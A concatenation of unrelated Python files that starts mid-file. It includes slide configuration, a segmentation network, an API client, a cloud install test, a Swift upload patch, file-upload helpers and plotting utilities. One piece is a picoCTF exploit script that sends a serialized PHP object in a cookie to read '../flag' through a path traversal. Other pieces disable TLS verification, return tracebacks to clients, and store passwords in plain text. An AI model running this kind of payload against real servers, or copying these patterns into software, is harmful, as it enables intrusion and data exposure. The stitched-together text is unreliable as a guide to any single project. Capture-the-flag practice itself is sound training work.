),
lp.MultiGraphicFrame(
[
images_path('excel-salaries-bar-graph.png'),
images_path('python-salaries-bar-graph.pdf'),
],
vertical=False,
title='Basic Graph Types: Bar Graphs'
),
lp.MultiGraphicFrame(
[
images_path('excel-salaries-box-whisker-plot.png'),
images_path('python-salaries-box-graph.pdf'),
],
vertical=False,
title='Basic Graph Types: Box and Whisker Plots'
),
InClassExampleFrame(
[
'I will now go through '
'"Intro to Graphics.ipynb"',
'Follow along as I go through the entire example notebook.',
],
title='Introduction to Graphing',
block_title='Graphing Using Pandas'
),
graphing_lab.presentation_frames(),
],
title='Graphing using Pandas',
short_title='Graphs'
),
pl.PresentationAppendix(appendix_frames)
]
DOCUMENT_CLASS_KWARGS = dict(
nav_header=True,
toc_sections=True
)
OUTPUT_NAME = TITLE
|
from django.contrib.gis.db import models
from django.test import ignore_warnings
from django.utils.deprecation import RemovedInDjango50Warning
from ..admin import admin
class City(models.Model):
name = models.CharField(max_length=30)
point = models.PointField()
class Meta:
app_label = "geoadmini_deprecated"
def __str__(self):
return self.name
site = admin.AdminSite(name="admin_gis")
with ignore_warnings(category=RemovedInDjango50Warning):
site.register(City, admin.OSMGeoAdmin)
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from .losses import *
from .modules.layers import *
from .modules.context_module import *
from .modules.attention_module import *
from .modules.decoder_module import *
from .backbones.Res2Net_v1b import res2net50_v1b_26w_4s
class UACANet(nn.Module):
# res2net based encoder decoder
def __init__(self, opt):
super(UACANet, self).__init__()
self.resnet = res2net50_v1b_26w_4s(pretrained=opt.pretrained, output_stride=opt.output_stride)
self.context2 = PAA_e(512, opt.channel)
self.context3 = PAA_e(1024, opt.channel)
self.context4 = PAA_e(2048, opt.channel)
self.decoder = PAA_d(opt.channel)
self.attention2 = UACA(opt.channel * 2, opt.channel)
self.attention3 = UACA(opt.channel * 2, opt.channel)
self.attention4 = UACA(opt.channel * 2, opt.channel)
self.loss_fn = bce_iou_loss
self.ret = lambda x, target: F.interpolate(x, size=target.shape[-2:], mode='bilinear', align_corners=False)
self.res = lambda x, size: F.interpolate(x, size=size, mode='bilinear', align_corners=False)
def forward(self, x, y=None):
base_size = x.shape[-2:]
x = self.resnet.conv1(x)
x = self.resnet.bn1(x)
x = self.resnet.relu(x)
x = self.resnet.maxpool(x)
x1 = self.resnet.layer1(x)
x2 = self.resnet.layer2(x1)
x3 = self.resnet.layer3(x2)
x4 = self.resnet.layer4(x3)
x2 = self.context2(x2)
x3 = self.context3(x3)
x4 = self.context4(x4)
f5, a5 = self.decoder(x4, x3, x2)
out5 = self.res(a5, base_size)
f4, a4 = self.attention4(torch.cat([x4, self.ret(f5, x4)], dim=1), a5)
out4 = self.res(a4, base_size)
f3, a3 = self.attention3(torch.cat([x3, self.ret(f4, x3)], dim=1), a4)
out3 = self.res(a3, base_size)
_, a2 = self.attention2(torch.cat([x2, self.ret(f3, x2)], dim=1), a3)
out2 = self.res(a2, base_size)
if y is not None:
loss5 = self.loss_fn(out5, y)
loss4 = self.loss_fn(out4, y)
loss3 = self.loss_fn(out3, y)
loss2 = self.loss_fn(out2, y)
loss = loss2 + loss3 + loss4 + loss5
else:
loss = 0
return {'pred': out2, 'loss': loss}
|
# -*- coding: utf-8 -*-
import requests
import arrow
from helpers.dictionary import dict_get
from . import logger
from simplejson.errors import JSONDecodeError
# 激活 logger 配置,使其能应用于 request & urllib3
logger.apply_config()
class RequestError(RuntimeError):
pass
class Result(object):
def __init__(self, code=200, message='', data=None, timestamp=None):
self.code = code
self.message = message
self.data = data
self.timestamp = arrow.get(timestamp)
def success(self):
return self.code == 200
def failed(self):
return not self.success()
def dot(self, key, default=None):
return dict_get(self.data, key, default) if isinstance(self.data, dict) else default
@property
def raw(self):
return {
'code': self.code,
'message': self.message,
'data': self.data,
'timestamp': self.timestamp.timestamp
}
class ErrorResult(Result):
def __init__(self, message=''):
super(ErrorResult, self).__init__(code=500, message=message)
class OApiClient(object):
_log = logger.get(__name__)
_options = dict(gateway='https://api.my-host.com/api',
appId='CRM',
appKey='XXXXX',
timeout=3,
headers={'Host': 'api.my-host.com'},
verify=False)
def __init__(self, **kwargs):
import urllib3
from requests.adapters import HTTPAdapter
self._options.update(kwargs)
# 当关闭 ssl 验证时,需要关闭掉 urllib3 的警告信息
# @link https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
if not self._options['verify'] and self._options['gateway'].startswith('https'):
urllib3.disable_warnings()
# 设置 request 自动重试
s = requests.Session()
r = urllib3.util.Retry(total=3, status_forcelist=[408, 508])
s.mount('http://', HTTPAdapter(max_retries=r))
s.mount('https://', HTTPAdapter(max_retries=r))
def request(self, api, post=None, headers=None):
'''请求 oapi 接口'''
if post is None:
post = {}
if headers is None:
headers = {}
post.update({'appId': self._options['appId'],
'appKey': self._options['appKey'],
'operator': 71})
headers.update(self._options['headers'])
kwargs = dict(url='{0}/{1}'.format(self._options['gateway'], api),
data=post,
headers=headers,
timeout=self._options['timeout'],
verify=self._options['verify'])
try:
self._log.info("Request as cURL: %s", self._request_as_curl(kwargs))
r = requests.post(**kwargs)
self._log.info("Response: %s", r.content.decode('utf8'))
return Result(**r.json())
except JSONDecodeError:
self._log.warning('JSON decode failed: %s', r.content.decode('utf8'))
return ErrorResult('JSON decode failed')
except BaseException as err:
self._log.warning('Request failed: %s', err)
return ErrorResult("Request failed: %s" % err)
def _request_as_curl(self, d):
'''将请求转换为 curl 格式,以方便调试'''
parts = ["curl '%s'" % d['url']]
if d['url'].startswith('https') and d['verify']:
parts.append('-k')
if d['data']:
parts.append("-d '%s'" % '&'.join(['%s=%s' % (k, v) for (k, v) in d['data'].items()]))
if d['headers']:
parts.append(' '.join("-H '%s: %s'" % (k, v) for (k, v) in d['headers'].items()))
if d['timeout']:
parts.append('--connect-timeout %d' % d['timeout'])
return ' '.join(parts)
|
'''
@author: MengLai
'''
import os
import tempfile
import uuid
import time
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.console_operations as cons_ops
import zstackwoodpecker.operations.scenario_operations as sce_ops
import zstacklib.utils.ssh as ssh
test_stub = test_lib.lib_get_test_stub()
test_obj_dict = test_state.TestStateDict()
tmp_file = '/tmp/%s' % uuid.uuid1().get_hex()
zstack_management_ip = os.environ.get('zstackManagementIp')
vm_inv = None
def create_vm(image):
l3_name = os.environ.get('l3PublicNetworkName')
l3_net_uuid = test_lib.lib_get_l3_by_name(l3_name).uuid
image_uuid = image.uuid
vm_name = 'zs_install_%s' % image.name
vm_instrance_offering_uuid = os.environ.get('instanceOfferingUuid')
vm_creation_option = test_util.VmOption()
vm_creation_option.set_instance_offering_uuid(vm_instrance_offering_uuid)
vm_creation_option.set_l3_uuids([l3_net_uuid])
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_name(vm_name)
vm_inv = sce_ops.create_vm(zstack_management_ip, vm_creation_option)
return vm_inv
def test():
global vm_inv
iso_path = os.environ.get('iso_path')
upgrade_script_path = os.environ.get('upgradeScript')
test_util.test_dsc('Create test vm to test zstack installation with console proxy.')
conditions = res_ops.gen_query_conditions('name', '=', os.environ.get('imageNameBase_zstack'))
image = res_ops.query_resource(res_ops.IMAGE, conditions)[0]
vm_inv = create_vm(image)
time.sleep(60)
vm_ip = vm_inv.vmNics[0].ip
vip = '172.20.61.253'
if vip == vm_ip:
vip = '172.20.61.254'
ssh_cmd = 'ssh -oStrictHostKeyChecking=no -oCheckHostIP=no -oUserKnownHostsFile=/dev/null %s' % vm_ip
ssh.make_ssh_no_password(vm_ip, test_lib.lib_get_vm_username(vm_inv), test_lib.lib_get_vm_password(vm_inv))
cmd = '%s ifconfig eth0:0 %s up' % (ssh_cmd, vip)
process_result = test_stub.execute_shell_in_process(cmd, tmp_file)
test_stub.update_iso(vm_ip, tmp_file, iso_path, upgrade_script_path)
target_file = '/root/zstack-all-in-one.tgz'
test_stub.prepare_test_env(vm_inv, target_file)
args = '-o -C %s -I %s' % (vip, vm_ip)
test_stub.execute_install_with_args(ssh_cmd, args, target_file, tmp_file)
test_stub.check_installation(vm_ip, tmp_file)
cmd = '%s cat /usr/local/zstack/apache-tomcat/webapps/zstack/WEB-INF/classes/zstack.properties | grep \'consoleProxyOverriddenIp = %s\'' % (ssh_cmd, vip)
(process_result, check_result) = test_stub.execute_shell_in_process_stdout(cmd, tmp_file)
check_result = check_result[:-1]
test_util.test_dsc('cat result: |%s|' % check_result)
expect_result = "consoleProxyOverriddenIp = %s" % vip
if check_result != expect_result:
test_util.test_fail('Fail to install ZStack with console proxy')
os.system('rm -f %s' % tmp_file)
sce_ops.destroy_vm(zstack_management_ip, vm_inv.uuid)
test_util.test_pass('ZStack installation Test Success')
#Will be called only if exception happens in test().
def error_cleanup():
global vm_inv
os.system('rm -f %s' % tmp_file)
sce_ops.destroy_vm(zstack_management_ip, vm_inv.uuid)
test_lib.lib_error_cleanup(test_obj_dict)
|
# There is a problem with quota enforcement in swift client.....
# https://github.com/openstack/python-swiftclient/blob/e65070964c7b1e04119c87e5f344d39358780d18/swiftclient/service.py#L2235
# content-length is only set if we upload a local file from a path on the file system.....
# any source will take the other code-path where, content-length get's set to None.
# Additionally, swiftclient.utils.LengthWrapper tests if a stream is seekable,
# however this test fails on non seekable io.BufferedReader, because it checks
# just for 'seek' attribute availability instead of calling 'seekable' on io.XXX object.
# There are probably a couple of ways to fix this:
# - patch as it is (requires user to wrap file like object in LengthWrapper)
# - respect 'Content-Length' header option (may require this code to wrap
# file like object in LengthWrapper if content-length is available,
# because my file-like object doesn't close automatically, even if there is no more data incoming)
# Use case:
# pass web request.body_file on directly to swift. this body_file doesn't get closed by the client,
# so we need some iterator, that stops after content-length bytes. (ReadableIterator, doesn't work here,
# and will hang forever waiting for more bytes.)
# Patch it here four our use case only...
from errno import ENOENT
from os.path import (
getmtime, getsize
)
from time import time
from six import text_type
from six.moves.urllib.parse import quote
from swiftclient.utils import (
config_true_value, ReadableToIterable, LengthWrapper,
report_traceback
)
from swiftclient.exceptions import ClientException
from swiftclient.service import (
logger, split_headers, interruptable_as_completed,
DISK_BUFFER, SwiftError
)
from swiftclient.service import SwiftService
def _upload_object_job(self, conn, container, source, obj, options,
results_queue=None):
if obj.startswith('./') or obj.startswith('.\\'):
obj = obj[2:]
if obj.startswith('/'):
obj = obj[1:]
res = {
'action': 'upload_object',
'container': container,
'object': obj
}
if hasattr(source, 'read'):
stream = source
path = None
else:
path = source
res['path'] = path
try:
if path is not None:
put_headers = {'x-object-meta-mtime': "%f" % getmtime(path)}
else:
put_headers = {'x-object-meta-mtime': "%f" % round(time())}
res['headers'] = put_headers
# We need to HEAD all objects now in case we're overwriting a
# manifest object and need to delete the old segments
# ourselves.
old_manifest = None
old_slo_manifest_paths = []
new_slo_manifest_paths = set()
segment_size = int(0 if options['segment_size'] is None
else options['segment_size'])
if (options['changed'] or options['skip_identical']
or not options['leave_segments']):
try:
headers = conn.head_object(container, obj)
is_slo = config_true_value(
headers.get('x-static-large-object'))
if options['skip_identical'] or (
is_slo and not options['leave_segments']):
chunk_data = self._get_chunk_data(
conn, container, obj, headers)
if options['skip_identical'] and self._is_identical(
chunk_data, path):
res.update({
'success': True,
'status': 'skipped-identical'
})
return res
cl = int(headers.get('content-length'))
mt = headers.get('x-object-meta-mtime')
if (path is not None and options['changed']
and cl == getsize(path)
and mt == put_headers['x-object-meta-mtime']):
res.update({
'success': True,
'status': 'skipped-changed'
})
return res
if not options['leave_segments']:
old_manifest = headers.get('x-object-manifest')
if is_slo:
for old_seg in chunk_data:
seg_path = old_seg['name'].lstrip('/')
if isinstance(seg_path, text_type):
seg_path = seg_path.encode('utf-8')
old_slo_manifest_paths.append(seg_path)
except ClientException as err:
if err.http_status != 404:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
# Merge the command line header options to the put_headers
put_headers.update(split_headers(
options['meta'], 'X-Object-Meta-'))
put_headers.update(split_headers(options['header'], ''))
# Don't do segment job if object is not big enough, and never do
# a segment job if we're reading from a stream - we may fail if we
# go over the single object limit, but this gives us a nice way
# to create objects from memory
if (path is not None and segment_size
and (getsize(path) > segment_size)):
res['large_object'] = True
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
full_size = getsize(path)
segment_futures = []
segment_pool = self.thread_manager.segment_pool
segment = 0
segment_start = 0
while segment_start < full_size:
if segment_start + segment_size > full_size:
segment_size = full_size - segment_start
if options['use_slo']:
segment_name = '%s/slo/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
else:
segment_name = '%s/%s/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
full_size, options['segment_size'], segment
)
seg = segment_pool.submit(
self._upload_segment_job, path, container,
segment_name, segment_start, segment_size, segment,
obj, options, results_queue=results_queue
)
segment_futures.append(seg)
segment += 1
segment_start += segment_size
segment_results = []
errors = False
exceptions = []
for f in interruptable_as_completed(segment_futures):
try:
r = f.result()
if not r['success']:
errors = True
segment_results.append(r)
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
errors = True
exceptions.append((err, traceback, err_time))
if errors:
err = ClientException(
'Aborting manifest creation '
'because not all segments could be uploaded. %s/%s'
% (container, obj))
res.update({
'success': False,
'error': err,
'exceptions': exceptions,
'segment_results': segment_results
})
return res
res['segment_results'] = segment_results
if options['use_slo']:
response = self._upload_slo_manifest(
conn, segment_results, container, obj, put_headers)
res['manifest_response_dict'] = response
new_slo_manifest_paths = {
seg['segment_location'] for seg in segment_results}
else:
new_object_manifest = '%s/%s/%s/%s/%s/' % (
quote(seg_container.encode('utf8')),
quote(obj.encode('utf8')),
put_headers['x-object-meta-mtime'], full_size,
options['segment_size'])
if old_manifest and old_manifest.rstrip('/') == \
new_object_manifest.rstrip('/'):
old_manifest = None
put_headers['x-object-manifest'] = new_object_manifest
mr = {}
conn.put_object(
container, obj, '', content_length=0,
headers=put_headers,
response_dict=mr
)
res['manifest_response_dict'] = mr
elif options['use_slo'] and segment_size and not path:
segment = 0
results = []
while True:
segment_name = '%s/slo/%s/%s/%08d' % (
obj, put_headers['x-object-meta-mtime'],
segment_size, segment
)
seg_container = container + '_segments'
if options['segment_container']:
seg_container = options['segment_container']
ret = self._upload_stream_segment(
conn, container, obj,
seg_container,
segment_name,
segment_size,
segment,
put_headers,
stream
)
if not ret['success']:
return ret
if (ret['complete'] and segment == 0) or\
ret['segment_size'] > 0:
results.append(ret)
if results_queue is not None:
# Don't insert the 0-sized segments or objects
# themselves
if ret['segment_location'] != '/%s/%s' % (
container, obj) and ret['segment_size'] > 0:
results_queue.put(ret)
if ret['complete']:
break
segment += 1
if results[0]['segment_location'] != '/%s/%s' % (
container, obj):
response = self._upload_slo_manifest(
conn, results, container, obj, put_headers)
res['manifest_response_dict'] = response
new_slo_manifest_paths = {
r['segment_location'] for r in results}
res['large_object'] = True
else:
res['response_dict'] = ret
res['large_object'] = False
else:
res['large_object'] = False
obr = {}
fp = None
try:
if path is not None:
content_length = getsize(path)
fp = open(path, 'rb', DISK_BUFFER)
contents = LengthWrapper(fp,
content_length,
md5=options['checksum'])
# TODO: patch here ... check if stream is already a LengthWrapper,
# and use it.
elif isinstance(stream, LengthWrapper):
content_length = stream._length
contents = stream
# TODO: patch end
else:
content_length = None
contents = ReadableToIterable(stream,
md5=options['checksum'])
etag = conn.put_object(
container, obj, contents,
content_length=content_length, headers=put_headers,
response_dict=obr
)
res['response_dict'] = obr
if (options['checksum'] and
etag and etag != contents.get_md5sum()):
raise SwiftError(
'Object upload verification failed: '
'md5 mismatch, local {0} != remote {1} '
'(remote object has not been removed)'
.format(contents.get_md5sum(), etag))
finally:
if fp is not None:
fp.close()
if old_manifest or old_slo_manifest_paths:
drs = []
delobjsmap = {}
if old_manifest:
scontainer, sprefix = old_manifest.split('/', 1)
sprefix = sprefix.rstrip('/') + '/'
delobjsmap[scontainer] = []
for part in self.list(scontainer, {'prefix': sprefix}):
if not part["success"]:
raise part["error"]
delobjsmap[scontainer].extend(
seg['name'] for seg in part['listing'])
if old_slo_manifest_paths:
for seg_to_delete in old_slo_manifest_paths:
if seg_to_delete in new_slo_manifest_paths:
continue
scont, sobj = \
seg_to_delete.split(b'/', 1)
delobjs_cont = delobjsmap.get(scont, [])
delobjs_cont.append(sobj)
delobjsmap[scont] = delobjs_cont
del_segs = []
for dscont, dsobjs in delobjsmap.items():
for dsobj in dsobjs:
del_seg = self.thread_manager.segment_pool.submit(
self._delete_segment, dscont, dsobj,
results_queue=results_queue
)
del_segs.append(del_seg)
for del_seg in interruptable_as_completed(del_segs):
drs.append(del_seg.result())
res['segment_delete_results'] = drs
# return dict for printing
res.update({
'success': True,
'status': 'uploaded',
'attempts': conn.attempts})
return res
except OSError as err:
traceback, err_time = report_traceback()
logger.exception(err)
if err.errno == ENOENT:
error = SwiftError('Local file %r not found' % path, exc=err)
else:
error = err
res.update({
'success': False,
'error': error,
'traceback': traceback,
'error_timestamp': err_time
})
except Exception as err:
traceback, err_time = report_traceback()
logger.exception(err)
res.update({
'success': False,
'error': err,
'traceback': traceback,
'error_timestamp': err_time
})
return res
SwiftService._upload_object_job = _upload_object_job
|
import requests
import base64
obj_ = b'O:10:"access_log":1:{s:8:"log_file";s:7:"../flag";}'
obj_encoded = base64.b64encode(obj_).decode()
print(obj_encoded)
cookie = {
"login": obj_encoded
}
r = requests.get("http://mercury.picoctf.net:14804/authentication.php", cookies=cookie)
print(r.content.decode())
|
class RepoStoreFactory:
""" the repo stores factory
The factory is used to create Repo handlers
"""
@staticmethod
def get_repo_stores():
""" return a list of supported repo handlers
Returns:
list of str -- the list of supported handlers
"""
return ['disk_handler', 'git_handler', 'memory_handler']
@staticmethod
def get(repo_store_type, **kwargs):
""" this method returns a handler of the specified type
This method is used to construct handler of the specified type using the provided arguments.
Currently these types are supported:
* disk_handler
* git_handler
* memory_handler
Args:
repo_store_type (str): the name of the repo store type
Raises:
Exception: raises an exception if the type is not supported
Returns:
RepoStore -- the constructed handler
"""
if repo_store_type == 'disk_handler':
from pailab.ml_repo.disk_handler import RepoObjectDiskStorage
return RepoObjectDiskStorage(**kwargs)
elif repo_store_type == 'git_handler':
from pailab.ml_repo.git_handler import RepoObjectGitStorage
return RepoObjectGitStorage(**kwargs)
elif repo_store_type == 'memory_handler':
from pailab.ml_repo.memory_handler import RepoObjectMemoryStorage
return RepoObjectMemoryStorage()
raise Exception('Cannot create RepoStore: Unknown repo type ' + repo_store_type +
'. Use only types from the list returned by RepoStoreFactory.get_repo_stores().')
class NumpyStoreFactory:
""" class to construct a numpy store for big data
"""
@staticmethod
def get_numpy_stores():
""" this method returns the supported types
Returns:
list of str -- list of supported big data handler types
"""
return ['memory_handler', 'hdf_handler', 'hdf_remote_handler']
@staticmethod
def get(numpy_store_type, **kwargs):
""" this method returns a handler of the specified type for handling big data
This method is used to construct a big data handler of the specified type using the provided arguments.
Currently these types are supported:
* memory_handler
* hdf_handler
Args:
numpy_store_type (str): the name of the big data store type
Raises:
Exception: raises an exception if the type is not supported
Returns:
NumpyStore -- the constructed handler
"""
if numpy_store_type == 'memory_handler':
from pailab.ml_repo.memory_handler import NumpyMemoryStorage
return NumpyMemoryStorage(**kwargs)
elif numpy_store_type == 'hdf_handler':
from pailab.ml_repo.numpy_handler_hdf import NumpyHDFStorage
return NumpyHDFStorage(**kwargs)
elif numpy_store_type == 'hdf_remote_handler':
from pailab.ml_repo.numpy_handler_hdf import NumpyHDFRemoteStorage
return NumpyHDFRemoteStorage(**kwargs)
raise Exception('Cannot create NumpyStore: Unknown type ' + numpy_store_type +
'. Use only types from the list returned by NumpyStoreFactory.get_numpy_stores().')
|
import yaml
def load_twilio_creds(file):
with open(file) as file:
auth = yaml.load(file, Loader=yaml.FullLoader)
return auth
|
import datetime
import json
import logging
import os
import socket
import traceback
import types
from exceptions.exceptions import ServerException
from exceptions.send_alert import send_dingding_alert
from logging.config import dictConfig
from typing import Any, Dict, Tuple, Union
from flask import Flask, request
from flask_cors import CORS
from werkzeug.exceptions import HTTPException
from blueprints import all_blueprints
from configures import settings
from models.base_model import BaseModel
from models.database_models import db
from resources import ApiResponse
logger = logging.getLogger(__name__)
class JsonEncoder(json.JSONEncoder):
def default(self, value) -> Any:
if isinstance(value, (datetime.datetime, datetime.date)):
return value.strftime("%Y-%m-%d %H:%M:%S")
if isinstance(value, ApiResponse):
return value.get()
if isinstance(value, BaseModel):
return value.marshal()
if isinstance(value, types.GeneratorType):
return [self.default(v) for v in value]
return json.JSONEncoder.default(self, value)
def create_app() -> Flask:
app = Flask(__name__)
CORS(app, supports_credentials=True)
init_config(app)
app.json_encoder = JsonEncoder
return app
def init_config(app) -> None:
app.config["SQLALCHEMY_DATABASE_URI"] = settings.SQLALCHEMY_DATABASE_URI
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = settings.SQLALCHEMY_TRACK_MODIFICATIONS
app.config['SECRET_KEY'] = settings.SECRET_KEY
register_blueprints(app)
app.register_error_handler(Exception, handle_exception)
db.init_app(app)
return
def register_blueprints(app) -> None:
for blueprint in all_blueprints:
app.register_blueprint(blueprint)
return
def handle_exception(e) -> Tuple[Dict[str, Union[Union[int, str, list], Any]], Union[int, Any]]:
code = 500
if isinstance(e, (HTTPException, ServerException)):
code = e.code
logger.exception(e)
exc = [v for v in traceback.format_exc(limit=10).split("\n")]
if str(code) == "500":
send_dingding_alert(request.url, request.args, request.json, repr(e), exc)
return {'error_code': code, 'error_msg': str(e), 'traceback': exc}, code
def init_logging() -> None:
level = 'INFO' if settings.NAMESPACE == 'PRODUCTION' else 'DEBUG'
dir_name = "./logs/{}".format(socket.gethostname())
if not os.path.exists(dir_name):
os.makedirs(dir_name)
config = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'brief': {'format': '%(message)s'},
'standard': {
'format': '[%(asctime)s] [%(levelname)s] [%(filename)s.%(funcName)s:%(lineno)3d] [%(process)d::%(thread)d] %(message)s'
},
},
'handlers': {
'default': {
'level': level,
'formatter': 'standard',
'class': 'logging.handlers.TimedRotatingFileHandler',
'filename': '{}/server.log'.format(dir_name),
'when': 'midnight',
'interval': 1,
'encoding': 'utf8',
},
'console': {'level': level, 'formatter': 'standard', 'class': 'logging.StreamHandler'},
'default_access': {
'level': level,
'formatter': 'brief',
'class': 'logging.handlers.TimedRotatingFileHandler',
'filename': '{}/access.log'.format(dir_name),
'when': 'midnight',
'interval': 1,
'encoding': 'utf8',
},
'console_access': {
'level': level,
'formatter': 'brief',
'class': 'logging.StreamHandler',
},
},
'loggers': {
'werkzeug': {
'handlers': ['default_access', 'console_access'],
'level': level,
'propagate': False,
},
'': {'handlers': ['default', 'console'], 'level': level, 'propagate': True},
},
}
def patch_wsgi_handler():
"""
忽略WSGIServer log标签
"""
from gevent.pywsgi import WSGIHandler
logger = logging.getLogger('werkzeug')
def log_request(self):
logger.info(WSGIHandler.format_request(self))
WSGIHandler.log_request = log_request
dictConfig(config)
patch_wsgi_handler()
|
network_analytics_fields = {
"report": {
"report_type": "network_analytics",
"report_interval": "last_30_days",
"columns": [
"hour",
"insertion_order_id",
"line_item_id",
"campaign_id",
"advertiser_id",
"pixel_id",
"imps",
"imps_viewed",
"clicks",
"cost",
"cpm",
"cpm_including_fees",
"revenue",
"revenue_including_fees",
"total_convs",
'geo_country'
],
'filters':[{'geo_country': 'FR'}],
"groups": ["advertiser_id", "hour"],
"format": "csv"
}
}
segment_load_fields = {
"report": {
"report_type": "segment_load",
"columns": ["segment_id",
"segment_name",
"month",
"total_loads",
"monthly_uniques",
"avg_daily_uniques"],
"format": "csv",
"report_interval": "month_to_date",
"groups": ["segment_id", "month"],
"orders": ["month"],
}}
|
# Generated by Django 3.2.3 on 2021-05-31 16:46
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('csiapp', '0003_auto_20210531_2052'),
]
operations = [
migrations.AlterField(
model_name='event',
name='end_date',
field=models.CharField(blank=True, max_length=200),
),
migrations.AlterField(
model_name='event',
name='start_date',
field=models.CharField(blank=True, max_length=200),
),
]
|
import random
def ChangeNumber(num):
table = '0123456789abcdefghijklmnopqrstuvwxyz'
result = []
temp = num
if 0 == temp:
result.append('0')
else:
while 0 < temp:
result.append(table[temp % 36])
temp //= 36
return ''.join([x for x in reversed(result)])
def get_callback():
callback_ = "bd__cbs__" + ChangeNumber(int(random.random() * 2147483648))
return callback_
def get_callback_p():
callback_ = "parent.bd__pcbs__" + ChangeNumber(int(random.random() * 2147483648))
return callback_
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os
import time
from werkzeug.utils import secure_filename
#allow jpg png for moment upload
ALLOWED_MOMENT = set(['png', 'jpg', 'jpeg'])
def allowedMoment(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_MOMENT
#upload moment in edit page
#return 2 for no privilege
#return 0 for error
#return file name for success
def momentImage(file, petId):
if file.filename == '':
return '2'
if file and allowedMoment(file.filename):
#name time with special time span
fileName = str(time.time()).replace('.', '-') + '.' + secure_filename(file.filename)
#store into pet id folder
foldPath = '../static/img/pet/' + str(petId) + '/moment/'
#create folder path if not exist
dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), foldPath)
if not os.path.exists(dir):
os.makedirs(dir)
try:
file.save(os.path.join(dir, fileName))
except Exception as err:
print('Something went wrong: {}'.format(err))
return '1'
#return filename for success
return fileName
#file type not allowed return 1
else:
return '2'
#allow jpg for user profile
ALLOWED_USER = set(['jpg'])
def allowedUser(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_USER
#upload user profile in edit panel
#return 2 for not valid js
#return 1 by success
#return 0 for error
def userAvatar(file, userId):
if file and allowedUser(file.filename):
fileName = str(userId) + '.jpg'
foldPath = '../static/img/user/'
#create folder path if not exist
dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), foldPath)
if not os.path.exists(dir):
os.makedirs(dir)
try:
#save profile image
file.save(os.path.join(dir, fileName))
except Exception as err:
print('Something went wrong: {}'.format(err))
return '0'
return '1'
else:
return '2'
#Allow png for pet profile update
ALLOWED_PET = set(['png'])
def allowedPet(filename):
return '.' in filename and \
filename.rsplit('.', 1)[1].lower() in ALLOWED_PET
#upload pet profile in edit panel
#return 0 for error
#return 1 for success
#return 2 for file error
def petAvatar(file, petId):
#check preset profile image name
if file.filename != '0.png':
return '2'
#check file format
if file and allowedPet(file.filename):
fileName = secure_filename(file.filename)
foldPath = '../static/img/pet/' + str(petId) + '/cover/'
#create folder path if not exist
dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), foldPath)
if not os.path.exists(dir):
os.makedirs(dir)
try:
#save profile image
file.save(os.path.join(dir, fileName))
return '1'
except Exception as err:
print('Something went wrong: {}'.format(err))
return '0'
else:
return '2'
|
# Generated by Django 2.2.7 on 2019-11-17 17:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blog', '0005_post_edit_date'),
]
operations = [
migrations.CreateModel(
name='SiteUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=20, unique=True)),
('first_name', models.CharField(max_length=20)),
('second_name', models.CharField(max_length=30)),
('registration_date', models.DateTimeField(blank=True, null=True)),
('picture', models.ImageField(blank=True, max_length=255, null=True, upload_to='UserPhotos/%username/')),
('password', models.CharField(max_length=30)),
],
),
]
|
# AUTOGENERATED! DO NOT EDIT! File to edit: 00_gram.ipynb (unless otherwise specified).
__all__ = ['linebreak', 'dist_from_point', 'lines_to_layer', 'layer_to_lines', 'get_point_on_line', 'radial_to_xy',
'gaussian_random_walk', 'LineFactory', 'ChordFactory', 'RandomChordFactory', 'RadiusModChordFactory',
'RadiusModBezierChordFactory', 'Turtle']
# Cell
import bezier
from matplotlib.collections import LineCollection
from matplotlib import pyplot as plt
import numpy as np
from penkit import write, preview
from pathlib import Path
import seaborn as sns
from tqdm import tqdm
linebreak = np.array([[np.nan],[np.nan]])
# Cell
def dist_from_point(line, point):
'''calculate euclidean distance of a set of points from a reference point'''
return ((line - point) ** 2).sum(axis=1) ** 0.5
# Cell
def lines_to_layer(lines):
nanlines = []
for line in lines:
_line = np.concatenate([line,np.array([[np.nan, np.nan]])])
nanlines.append(_line)
nanlines = np.concatenate(nanlines)
x = nanlines[:,0]
y = nanlines[:,1]
return (x,y)
# Cell
def layer_to_lines(layer):
_layer = layer[:, 1:] # drop first column containing placeholder nan
_layer = np.append(_layer, linebreak, axis=1) # add linebreak to end
isnan = np.isnan(_layer[0, :]).nonzero()[0]
lines = []
start_ind = 0
for nan_ind in isnan:
line = _layer[:, start_ind:nan_ind].T
lines.append(line)
start_ind = nan_ind + 1
return lines
# Cell
def get_point_on_line(pointA, pointB, distance):
AB = pointB - pointA
pointC = pointA + (AB * distance)
return pointC
# Cell
def radial_to_xy(r, theta):
x = np.cos(theta) * r
y = np.sin(theta) * r
return (x, y)
# Cell
def gaussian_random_walk(n, step_init=1, step_mu=0., step_std=1, scale=True):
ys = []
y = step_init
if scale:
step_mu /= n
step_std /= n
for i in range(n):
ys.append(y)
y += np.random.randn() * step_std + step_mu
return np.array(ys)
# Cell
class LineFactory(object):
def __init__(self):
self.lines = np.array([[np.nan],
[np.nan]])
def gen_line(self, pointA, pointB, ):
line = np.array([[pointA[0], pointB[0]],
[pointA[1], pointB[1]],
])
return line
def add_line(self, line, terminate=True):
if terminate:
line = np.append(line, linebreak.copy(), axis=1)
self.lines = np.append(self.lines, line, axis=1)
